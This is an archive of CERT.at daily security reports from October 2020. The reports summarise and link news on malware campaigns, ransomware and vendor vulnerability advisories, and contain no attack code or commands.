--------------------------------------------- We continue to describe our approaches to searching for vulnerabilities in industrial systems based on the OPC UA protocol. In this article, we examine new techniques that can be used to search for memory corruption vulnerabilities if the source code is available. We also discuss an example of fuzzing using libfuzzer. --------------------------------------------- https://ics-cert.kaspersky.com/reports/2020/10/19/practical-example-of-fuzz… ===================== = Vulnerabilities = ===================== ∗∗∗ VMware Horizon Server and VMware Horizon Client updates address multiple security vulnerabilities (CVE-2020-3997, CVE-2020-3998) ∗∗∗ --------------------------------------------- VMware Horizon Server does not correctly validate user input. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 4.1. --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2020-0024.html ∗∗∗ Sicherheitsupdate: Nvidia Geforce Experience macht PCs vielfältig angreifbar ∗∗∗ --------------------------------------------- Nvidias Entwickler haben drei Sicherheitslücken im Grafikkarten-Tool Geforce Experience geschlossen. --------------------------------------------- https://heise.de/-4937481 ∗∗∗ Cisco Adaptive Security Appliance Software SSL/TLS Denial of Service Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM SPSS Statistics ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli System Automation for Multiplatforms Jul 2020 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by multiple vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect z/TPF ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Multiple vulnerabilities affect IBM Tivoli Monitoring embedded WebSphere Application and IHS server ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli System Automation Application Manager Jul 2020 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM SPSS Statistics ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… ∗∗∗ Security Bulletin: Enterprise Content Management System Monitor is affected by a vulnerability in IBM® SDK Java™ Technology Edition ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-enterprise-content-manage… ∗∗∗ Multiple Vulnerabilities in PubliXone ∗∗∗ --------------------------------------------- https://sec-consult.com/./en/blog/advisories/multiple-vulnerabilities-in-pu… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 22.10.2020
by Daily end-of-shift report 22 Oct '20

22 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 21-10-2020 18:00 − Donnerstag 22-10-2020 18:00 Handler: Dimitri Robl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Das sind die Gewinner von Österreichs größtem Hacker-Wettbewerb ∗∗∗ --------------------------------------------- Das Finale der Austria Cyber Security Challenge 2020 wurde virtuell ausgetragen. Die Sieger stehen fest. --------------------------------------------- https://futurezone.at/digital-life/das-sind-die-gewinner-von-oesterreichs-g… ∗∗∗ BazarLoader phishing lures: plan a Halloween party, get a bonus and be fired in the same afternoon, (Thu, Oct 22nd) ∗∗∗ --------------------------------------------- Phishing messages distributing BazarLoader have come to be commonplace in the past six months, but in the last couple of weeks Ive been seeing more and more e-mails spreading this malware caught in my quarantine. Although contents of these messages differ, their appearance is usually similar [...] --------------------------------------------- https://isc.sans.edu/diary/rss/26710 ∗∗∗ XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability ∗∗∗ --------------------------------------------- This tech support scam is being spread via Facebook links and uses several redirection mechanisms to avoid detection. --------------------------------------------- https://blog.malwarebytes.com/cybercrime/2020/10/xss-to-tss-tech-support-sc… ∗∗∗ Abusing RDP’s Remote Credential Guard with Rubeus PTT ∗∗∗ --------------------------------------------- TL;DR Microsoft’s Remote Credential Guard (RCG) for RDP protects creds if an RDP server is compromised. It leaves little scope for password or NTLM credential dumping when a user connects [...] --------------------------------------------- https://www.pentestpartners.com/security-blog/abusing-rdps-remote-credentia… ===================== = Vulnerabilities = ===================== ∗∗∗ VU#208577: Chocolatey Boxstarter vulnerable to privilege escalation due to weak ACLs ∗∗∗ --------------------------------------------- Chocolatey Boxstarter fails to properly set ACLs, which can allow an unprivileged Windows user to be able to run arbitrary code with SYSTEM privileges. --------------------------------------------- https://kb.cert.org/vuls/id/208577 ∗∗∗ Gefährliche Lücken in Cisco-Software für Netzwerkschutz und -Management ∗∗∗ --------------------------------------------- Der Netzwerkausrüster Cisco hat wichtige Sicherheitsupdates für verschiedene Netzwerk-Software veröffentlicht. Keine Lücke gilt als kritisch. --------------------------------------------- https://heise.de/-4936512 ∗∗∗ Vulnerability Spotlight: A deep dive into WAGO’s cloud connectivity and the vulnerabilities that arise ∗∗∗ --------------------------------------------- WAGO makes several programmable automation controllers that are used in many industries including automotive, rail, power engineering, manufacturing and building management. Cisco Talos discovered 41 vulnerabilities in their PFC200 and PFC100 controllers. --------------------------------------------- https://blog.talosintelligence.com/2020/10/vulnerability-spotlight-deep-div… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM InfoSphere Information Server ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Security Bulletin: A security vulnerability in Node.js node-fetch module affects IBM Cloud Pak for Multicloud Management Infrastructure Management and Managed Service. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… ∗∗∗ Security Bulletin: A security vulnerability in Node.js lodash module affects IBM Cloud Pak for Multicloud Management Infrastructure Management. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 22.10.2020
by Daily end-of-shift report 22 Oct '20

22 Oct '20

-- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 21.10.2020
by Daily end-of-shift report 21 Oct '20

21 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 20-10-2020 18:00 − Mittwoch 21-10-2020 18:00 Handler: Dimitri Robl Co-Handler: Thomas Pribitzer ===================== = News = ===================== ∗∗∗ TrickBot malware under siege from all sides, and its working ∗∗∗ --------------------------------------------- The Trickbot malware operation is on the brink of going down completely following efforts from an alliance of cybersecurity and hosting providers targeting the botnets command and control servers. --------------------------------------------- https://www.bleepingcomputer.com/news/security/trickbot-malware-under-siege… ∗∗∗ LockBit ransomware moves quietly on the network, strikes fast ∗∗∗ --------------------------------------------- LockBit ransomware takes as little as five minutes to deploy the encryption routine on target systems once it lands on the victim network. --------------------------------------------- https://www.bleepingcomputer.com/news/security/lockbit-ransomware-moves-qui… ∗∗∗ Shipping dangerous goods, (Wed, Oct 21st) ∗∗∗ --------------------------------------------- For the past several months, I've been tracking a campaign that sends rather odd-looking emails like this. --------------------------------------------- https://isc.sans.edu/diary/rss/26702 ∗∗∗ Securing Your Online Store for the Holidays ∗∗∗ --------------------------------------------- Shopping season is here, and so is the opportunity for ecommerce site owners to grow their business and generate revenue. In lieu of the changing global ecommerce climate that this pandemic has produced, comes the importance of securing your website to protect your users — and your revenue streams. --------------------------------------------- https://blog.sucuri.net/2020/10/securing-your-online-store-for-the-holidays… ∗∗∗ Studie: Mehr als die Häfte aller Windows-Server ist Security-Schrott ∗∗∗ --------------------------------------------- Rund 58 Prozent aller Windows Server im Internet werden nicht mehr regelmäßig mit Sicherheits-Updates versorgt und sind damit tickende Zeitbomben. --------------------------------------------- https://heise.de/-4933295 ∗∗∗ How safe is your USB drive? ∗∗∗ --------------------------------------------- What are some of the key security risks to be aware of when using USB flash drives and how can you mitigate the threats? --------------------------------------------- https://www.welivesecurity.com/2020/10/20/how-safe-is-your-usb-drive/ ∗∗∗ Video: So entlarven Sie betrügerische Werbung im Internet ∗∗∗ --------------------------------------------- Ob auf Google, in Sozialen Medien oder in Apps – überall lauert Werbung, die uns dazu bringen will, ein bestimmtes Produkt zu kaufen oder eine Dienstleistung in Anspruch zu nehmen. Doch nicht jede Werbung ist seriös. --------------------------------------------- https://www.watchlist-internet.at/news/video-so-entlarven-sie-betruegerisch… ∗∗∗ IP Spoofing inbound verhindern ∗∗∗ --------------------------------------------- Die Brigham Young University schickt gerade Empfehlungsschreiben an Internet Provider aus, in denen darauf hingewiesen wird, dass es beidiesen möglich ist, eingehende IP Pakete mit Source-Adressen aus dem Netz des Internet Providers zu empfangen. --------------------------------------------- https://cert.at/de/blog/2020/10/ip-spoofing-inbound-verhindern ===================== = Vulnerabilities = ===================== ∗∗∗ Big Blue Button: Das große blaue Sicherheitsrisiko ∗∗∗ --------------------------------------------- Kritische Sicherheitslücken, die Golem.de dem Entwickler der Videochat-Software Big Blue Button meldete, sind erst nach Monaten geschlossen worden. --------------------------------------------- https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisik… ∗∗∗ Chrome zero-day in the wild – patch now! ∗∗∗ --------------------------------------------- https://nakedsecurity.sophos.com/2020/10/21/chrome-zero-day-in-the-wild-pat… ∗∗∗ Oracle Critical Patch Update Advisory - October 2020 ∗∗∗ --------------------------------------------- https://www.oracle.com/security-alerts/cpuoct2020.html ∗∗∗ Security Bulletin: A security vulnerability in angular.js affects IBM Cloud Pak for Multicloud Management Infrastructure Management and Managed Service. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… ∗∗∗ Security Bulletin: A security vulnerability in GO affects IBM Cloud Pak for Multicloud Management Managed Service. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… ∗∗∗ Security Bulletin: A vulnerability has been identified in IBM Spectrum Scale where an unprivileged local user may cause a denial of service ( CVE-2020-4411) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-has-been-… ∗∗∗ Security Bulletin: A security vulnerability in Node.js acorn and bootstrap-select affects IBM Cloud Pak for Multicloud Management Infrastructure Management and Managed Service. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… ∗∗∗ Security Bulletin: A security vulnerability in GO affects IBM Cloud Pak for Multicloud Management Managed Service. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… ∗∗∗ Security Bulletin: BIND for IBM i is affected by CVE-2020-8622 and CVE-2020-8624 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-bind-for-ibm-i-is-affecte… ∗∗∗ Security Bulletin: A vulnerability in IBM Spectrum Scale packaged in IBM Elastic Storage System could cause a denial of service (CVE-2020-4756) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-sp… ∗∗∗ Security Bulletin: IBM MQ could allow leak sensitive information due to an error within the pre-v7 pubsub logic (CVE-2020-4319) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-could-allow-leak-s… ∗∗∗ Security Bulletin: Multiple vulnerabilities in GNU Binutils affect IBM Netezza Platform Software clients. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 20.10.2020
by Daily end-of-shift report 20 Oct '20

20 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Montag 19-10-2020 18:00 − Dienstag 20-10-2020 18:00 Handler: Dimitri Robl Co-Handler: Thomas Pribitzer ===================== = News = ===================== ∗∗∗ Ryuk Ransomware Gang Uses Zerologon Bug for Lightning-Fast Attack ∗∗∗ --------------------------------------------- Researchers said the group was able to move from initial phish to full domain-wide encryption in just five hours. --------------------------------------------- https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/1602… ∗∗∗ Mirai-alike Python Scanner, (Tue, Oct 20th) ∗∗∗ --------------------------------------------- Last week, I found an interesting Python script that behaves like a Mirai bot. It scans for vulnerable devices exposing their telnet (TCP/23) interface in the wild, then tries to connect using a dictionary of credentials. --------------------------------------------- https://isc.sans.edu/diary/rss/26698 ∗∗∗ Advanced Ransomware Attacks ∗∗∗ --------------------------------------------- SI-CERT, the national CSIRT of Slovenia has been handling reports of ransomware attacks on a regular basis since April 2012. Until 2019, attack victims were selected randomly as part of a mass-volume campaign aiming to spread the virus. However, since 2019 the attacks have been more targeted. --------------------------------------------- https://connect.geant.org/2020/10/19/advanced-ransomware-attacks ∗∗∗ Beim Kauf auf Kleinanzeigen-Plattformen: Zahlung nicht via PayPal-Funktion „Geld an Freunde oder Familie senden“ durchführen ∗∗∗ --------------------------------------------- Auf den beliebten Kleinanzeigen-Plattformen wie willhaben, shpock oder ebay Kleinanzeigen treiben auch Kriminelle ihr Unwesen. Neben Vorkasse- und Treuhand-Betrug ist auch der PayPal-Trick eine beliebte Masche, um KäuferInnen abzuzocken. --------------------------------------------- https://www.watchlist-internet.at/news/beim-kauf-auf-kleinanzeigen-plattfor… ===================== = Vulnerabilities = ===================== ∗∗∗ Security Bulletins Posted ∗∗∗ --------------------------------------------- Adobe has published security bulletins for Adobe Illustrator (APSB20-53), Adobe Dreamweaver (APSB20-55), Marketo(APSB20-60), Adobe Animate (APSB20-61), Adobe After Effects (APSB20-62), Adobe Photoshop (APSB20-63), Adobe Premiere Pro (APSB20-64), Adobe Media Encoder (APSB20-65), Adobe InDesign (APSB20-66) and Adobe Creative Cloud Desktop Application (APSB20-68). --------------------------------------------- https://blogs.adobe.com/psirt/?p=1930 ∗∗∗ QNAP: Sicherheitsupdates für QTS wehren "Zerologon"-Angriffe auf NAS ab ∗∗∗ --------------------------------------------- Je nach Konfiguration können Netzwerkspeicher von QNAP über die Sicherheitslücke "Zerologon" aus der Ferne angreifbar sein. Updates für QTS stehen bereit. --------------------------------------------- https://heise.de/-4932748 ∗∗∗ Seven mobile browsers vulnerable to address bar spoofing attacks ∗∗∗ --------------------------------------------- Vulnerabilities allow attackers to trick users into accessing malicious sites while showing the incorrect URL in the address bar. --------------------------------------------- https://www.zdnet.com/article/seven-mobile-browsers-vulnerable-to-address-b… ∗∗∗ Security Bulletin: Cross-Site Scripting Security Vulnerability Affects IBM Sterling B2B Integrator Standard Edition ( CVE-2020-4564) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-secu… ∗∗∗ Security Bulletin: A vulnerability has been identified in IBM Spectrum Scale where an unprivileged local user may cause a denial of service ( CVE-2020-4411) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-has-been-… ∗∗∗ Security Bulletin: IBM Elastic Storage System 3000 is affected by weak cryptographic algorithm (CVE-2020-4350) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-syste… ∗∗∗ Security Bulletin: SQL Injection Vulnerability Affects the Graphic Process Modeler in IBM Sterling B2B Integrator (CVE-2019-4680) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-sql-injection-vulnerabili… ∗∗∗ Security Bulletin: There are multiple vulnerabilities in the Linux Kernel used in IBM Elastic Storage System ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-there-are-multiple-vulner… ∗∗∗ Security Bulletin: A vulnerability in IBM Spectrum Scale packaged in IBM Elastic Storage System could cause a denial of service (CVE-2020-4756) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-sp… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM MessageGateway ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Cross-Site Scripting Vulnerability Affects IBM Sterling File Gateway (CVE-2020-4564) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln… ∗∗∗ Security Bulletin: Multiple vulnerabilities affect the IBM Spectrum Scale GUI. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Multiple vulnerabilities in the Linux Kernel used in IBM Elastic Storage System ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ XSA-347 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-347.html ∗∗∗ XSA-346 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-346.html ∗∗∗ XSA-345 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-345.html ∗∗∗ XSA-332 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-332.html ∗∗∗ XSA-331 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-331.html ∗∗∗ XSA-286 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-286.html ∗∗∗ Security Vulnerabilities fixed in Firefox 82 ∗∗∗ --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/mfsa2020-45/ ∗∗∗ Synology-SA-20:24 Media Server ∗∗∗ --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_20_24 ∗∗∗ Synology-SA-20:23 Download Station ∗∗∗ --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_20_23 ∗∗∗ VMware ESXi: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-1003 ∗∗∗ Nagios Enterprises Nagios XI: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-1005 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 19.10.2020
by Daily end-of-shift report 19 Oct '20

19 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 16-10-2020 18:00 − Montag 19-10-2020 18:00 Handler: Dimitri Robl Co-Handler: Robert Waldner ===================== = News = ===================== ∗∗∗ Hackers now abuse BaseCamp for free malware hosting ∗∗∗ --------------------------------------------- Phishing campaigns have started to use Basecamp as part of malicious phishing campaigns that distribute malware or steal your login credentials. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hackers-now-abuse-basecamp-f… ∗∗∗ Enumerate AWS API Permissions Without Logging to CloudTrail ∗∗∗ --------------------------------------------- The following is a technical writeup for a bug I found in the AWS API that allows you to enumerate certain permissions for a role without logging to CloudTrail. It affects 645 different API actions across 40 different AWS services. This would be beneficial for a Penetration Tester or a Red Teamer to enumerate what permissions the role or user they’ve compromised has access to without alerting the blue team as no logs are generated in CloudTrail. --------------------------------------------- https://frichetten.com/blog/aws-api-enum-vuln/ ∗∗∗ Secret fragments: Remote code execution on Symfony based websites ∗∗∗ --------------------------------------------- This configuration value, secret, is also used, for instance, to build CSRF tokens and remember-me tokens. Given its importance, this value must obviously be very random. Unfortunately, we discovered that oftentimes, the secret either has a default value, or there exist ways to obtain the value, bruteforce it offline, or to purely and simply bypass the security check that it is involved with. It most notably affects Bolt, eZPlatform, and eZPublish. --------------------------------------------- https://www.ambionics.io/blog/symfony-secret-fragment ===================== = Vulnerabilities = ===================== ∗∗∗ Magento, Visual Studio Code users: You need to patch! ∗∗∗ --------------------------------------------- * Microsoft has fixed CVE-2020-17023, a remote code execution vulnerability in Visual Studio Code, its free and extremely popular source-code editor that’s available for Windows, macOS and Linux. * Microsoft has also fixed a RCE (CVE-2020-17022) in the way that Microsoft Windows Codecs Library handles objects in memory, which could be triggered by a program processing a specially crafted image file. It only affects Windows 10 users, and only if they installed the optional HEVC or “HEVC from Device Manufacturer” media codecs from Microsoft Store. * After fixing just one Adobe Flash Player flaw on October 2020 Patch Tuesday, Adobe has followed up with security updates for several Magento Commerce and Magento Open Source versions. --------------------------------------------- https://www.helpnetsecurity.com/2020/10/19/magento-visual-studio-code-users… ∗∗∗ Atlassian Jira Software: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen (CVE-2020-14185) ∗∗∗ --------------------------------------------- Ein entfernter, anonymer Angreifer kann eine Schwachstelle in der Atlassian Jira Software ausnutzen, um Sicherheitsvorkehrungen zu umgehen. --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-1002 ∗∗∗ Discord desktop app vulnerability chain triggered remote code execution attacks ∗∗∗ --------------------------------------------- Discord has patched a critical issue in the desktop version of the messaging app which left users vulnerable to remote code execution (RCE) attacks. --------------------------------------------- https://www.zdnet.com/article/discord-desktop-app-vulnerable-to-remote-code… ∗∗∗ FRITZ!Box DNS Rebinding Protection Bypass ∗∗∗ --------------------------------------------- RedTeam Pentesting discovered a vulnerability in FRITZ!Box router devices which allows to resolve DNS answers that point to IP addresses in the private local network, despite the DNS rebinding protection mechanism. --------------------------------------------- https://www.redteam-pentesting.de/en/advisories/rt-sa-2020-003/ ∗∗∗ ReQuest Serious Play F3 Media Server 7.0.3 Unauthenticated Remote Code Execution ∗∗∗ --------------------------------------------- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5602.php ∗∗∗ ReQuest Serious Play F3 Media Server 7.0.3 Remote Denial of Service ∗∗∗ --------------------------------------------- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5601.php ∗∗∗ ReQuest Serious Play F3 Media Server 7.0.3 Debug Log Disclosure ∗∗∗ --------------------------------------------- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5600.php ∗∗∗ ReQuest Serious Play Media Player 3.0 Directory Traversal File Disclosure Vulnerability ∗∗∗ --------------------------------------------- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5599.php ∗∗∗ Security Bulletin: Multiple Oracle Database Server Security Vulnerabilities Affect IBM Emptoris Supplier Lifecycle Mgmt ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-oracle-database-… ∗∗∗ Security Bulletin: Multiple vulnerabilities in the IBM SDK, Java Technology Edition affects IBM Performance Management products Q3 2020 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Multiple Oracle Database Server Security Vulnerabilities Affect IBM Emptoris Program Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-oracle-database-… ∗∗∗ Security Bulletin: Multiple Oracle Database Server Security Vulnerabilities Affect IBM Emptoris Sourcing ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-oracle-database-… ∗∗∗ Security Bulletin: Multiple Oracle Database Server Security Vulnerabilities Affect IBM Emptoris Contract Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-oracle-database-… ∗∗∗ Security Bulletin: Multiple Oracle Database Server Security Vulnerabilities Affect IBM Emptoris Strategic Supply Management Platform ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-oracle-database-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by a DB2 jar vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 16.10.2020
by Daily end-of-shift report 16 Oct '20

16 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 15-10-2020 18:00 − Freitag 16-10-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ NPM nukes NodeJS malware opening Windows, Linux reverse shells ∗∗∗ --------------------------------------------- NPM has removed multiple packages hosted on its repository this week that established connection to remote servers and exfiltrated user data. These 4 packages had collected over 1,000 total downloads over the course of the last few months up until being removed by NPM yesterday. --------------------------------------------- https://www.bleepingcomputer.com/news/security/npm-nukes-nodejs-malware-ope… ∗∗∗ CVE-2020-16898: Windows ICMPv6 Router Advertisement RRDNS Option Remote Code Execution Vulnerability, (Thu, Oct 15th) ∗∗∗ --------------------------------------------- Highlights - Do not disable IPv6 entirely unless you want to break Windows in interesting ways. - This can only be exploited from the local subnet. - But it may lead to remote code execution / BSOD - PoC exploit is easy, but actual RCE is hard. - Patch For more details, see also the YouTube video I just published: [...] --------------------------------------------- https://isc.sans.edu/diary/rss/26684 ∗∗∗ Traffic Analysis Quiz: Ugly-Wolf.net, (Fri, Oct 16th) ∗∗∗ --------------------------------------------- It's that time of the month again... Time for another traffic analysis quiz! This one is from a Windows 10 client logged into an Active Directory (AD) environment. --------------------------------------------- https://isc.sans.edu/diary/rss/26688 ∗∗∗ CVE-2020-15157 "ContainerDrip" Write-up ∗∗∗ --------------------------------------------- CVE-2020-15157: If an attacker publishes a public image with a crafted manifest that directs one of the image layers to be fetched from a web server they control and they trick a user or system into pulling the image, they can obtain the credentials used by ctr/containerd to access that registry. In some cases, this may be the user’s username and password for the registry. In other cases, this may be the credentials attached to the cloud virtual instance which can grant access to other [...] --------------------------------------------- https://darkbit.io/blog/cve-2020-15157-containerdrip ∗∗∗ CMS Drupal: OAuth Server-Modul anfällig für SQL-Injection-Angriffe ∗∗∗ --------------------------------------------- Das OAuth Server-Modul für Drupal 8 benötigt ein Update auf 8.x-1.1. Die neue Version schließt eine "moderat kritische" Lücke. --------------------------------------------- https://heise.de/-4930778 ===================== = Vulnerabilities = ===================== ∗∗∗ VMware Horizon Client update addresses a denial-of-service vulnerability (CVE-2020-3991) ∗∗∗ --------------------------------------------- VMware Horizon Client for Windows contains a denial-of-service vulnerability due to a file system access control issue during install time. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.9. --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2020-0022.html ∗∗∗ Kritische Lücke in SonicWall Firewall für Denial-of-Service-Angriffe ausnutzbar ∗∗∗ --------------------------------------------- Es stehen Updates für mehrere Versionen von SonicOS bereit, die eine kritische sowie zehn weitere Sicherheitslücken von "Medium" bis "High" beseitigen. --------------------------------------------- https://heise.de/-4930351 ∗∗∗ CVE-2020-17022 | Microsoft Windows Codecs Library Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. --------------------------------------------- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020… ∗∗∗ Adobe patches Magento bugs that lead to code execution, customer list tampering ∗∗∗ --------------------------------------------- The out-of-band security update tackles eight critical and important vulnerabilities. --------------------------------------------- https://www.zdnet.com/article/adobe-patches-magento-bugs-that-lead-to-code-… ∗∗∗ BlackBerry Powered by Android Security Bulletin - September 2020 ∗∗∗ --------------------------------------------- http://support.blackberry.com/kb/articleDetail?language=en_US&articleNumber… ∗∗∗ Security Bulletin: Multiple Vulnerabilities in Jackson Core affect IBM Maximo Asset Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: IBM Security Guardium Big Data Intelligence (SonarG) is affected by a 3RD PARTY Cryptographc vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-big… ∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to Authentication Bypass (CVE-2020-4493) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme… ∗∗∗ Security Bulletin: Vulnerabilities in Apache ActiveMQ affect IBM Operations Analytics Predictive Insights (CVE-2020-11998, CVE-2020-13920) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache… ∗∗∗ Security Bulletin: IBM Resilient SOAR could allow a privileged user to inject malicious commands through Python3 scripting (CVE-2020-4636). ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-soar-could-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 15.10.2020
by Daily end-of-shift report 15 Oct '20

15 Oct '20

